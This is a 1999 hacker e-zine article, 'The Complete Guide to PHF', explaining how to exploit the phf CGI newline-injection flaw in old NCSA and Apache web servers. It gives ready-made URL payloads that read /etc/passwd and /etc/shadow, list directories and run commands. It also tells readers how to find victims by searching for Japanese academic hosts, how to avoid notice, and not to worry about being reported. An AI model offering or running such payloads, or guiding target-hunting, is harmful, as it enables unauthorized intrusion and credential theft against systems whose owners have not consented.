::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99 ::: The Discordant Opposition Journal ::: Issue 2 - File 5 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Complete Guide to PHF: Digital Avatar 1. What is PHF? The PHF (packet handler function) white pages directory services program distributed with the NCSA httpd, versions 1.5a and earlier, and also included in the Apache distribution prior to version 1.0.5, passes unchecked newline (hex 0a) characters to the Unix shell. Unauthorised access to the server host may allow an intruder to read, modify, or destroy files. The phf program implements a form-based interface to a local CCSO Name Server. The CCSO Name Server is a white pages service used for looking up name and address information about people. With phf, a hacker can execute commands on the server host using the same user-id as the user running the "httpd" server. If "httpd" is being run as root, the hacker's commands are also run as root. He can access any file on the system that is accessible to the user-id that is running the httpd server. The phf phone book script file in the cgi-bin directory can be exploited to give a hacker the password (etc/passwd) file in Unix systems. The phf phone book script is distributed with NCSA and Apache httpd. This default file is a sample form titled "Form for CSO PH query" and can be exploited to view files on a system. The phf exploit is one of the most common ways of obtaining password files of of systems on the internet. 2. How do I use PHF? Alright. To use PHF you enter the following command line into any web browser: http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd This takes you to the /etc/passwd file of the target computer. Neat, huh? Anything after Qalias=x%0a/bin/ is the command. You can do virtually any command. You cannot edit files though. It doesnt work. Examples: /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow -displays the shadow file /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd -displays the passwd file /cgi-bin/phf?Qalias=x%0a/bin/ls%20/ -lists the root dir /cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin -lists the bin dir /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin -lists the bin dir and shows file permissions /cgi-bin/phf?Q=%0aid - gives you the uid of nobody /cgi-bin/phf?Q=%0a/bin/uname%20-a - give operating system /cgi-bin/phf?Q=%0apwd - print working directory /cgi-bin/test-cgi?* - get all files in /cgi-bin/ /cgi-bin/test-cgi?/* - get all directories /cgi-bin/nph-test-cgi?* - get all files in /cgi-bin/ /cgi-bin/nph-test-cgi?/* - get all directories /cgi/bin/phf?Q=%0a/bin/ypcat%20passwd - get ypcat passwd 3. What happens if it says "404 Error" or "Caught on Candid Camera"? Well, a 404 Error indicates that the target is patched of this hole already or that they do not have PHF on their system, among other things. If it gives you a 404, move on to a new target. Caught on Candid Camera is a small joke in a way. When you get this screen it means they have logged that you have just tried to access them via PHF. Don't worry about getting caught though. They hardly ever report it. Just don't go try the same place every time. If they are logging you then they might get a little curious after you try PHF on them 10 times. Use PHF wisely. 4. How do I find new targets? The usual way to get new targets is to pick a country, say Japan. Go to www.altavista.com, next and search for "ac.jp". This will turn up a lot of results from the academic hosts in Japan. Take each listing's address and put it before the /cgi-bin in the PHF command line. You can scan all the results quite quickly if you have two browser windows open. One contains: http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd The other contains your altavista search. Simply Copy the address from altavistsa and paste it onto the www.target_goes_here.com in your other window. You can go through 75-100 sites quite easily. I tend to get about 1/100 hits that have a usable PHF. Don't expect anything better... -Digital Avatar apparitione@gmx.de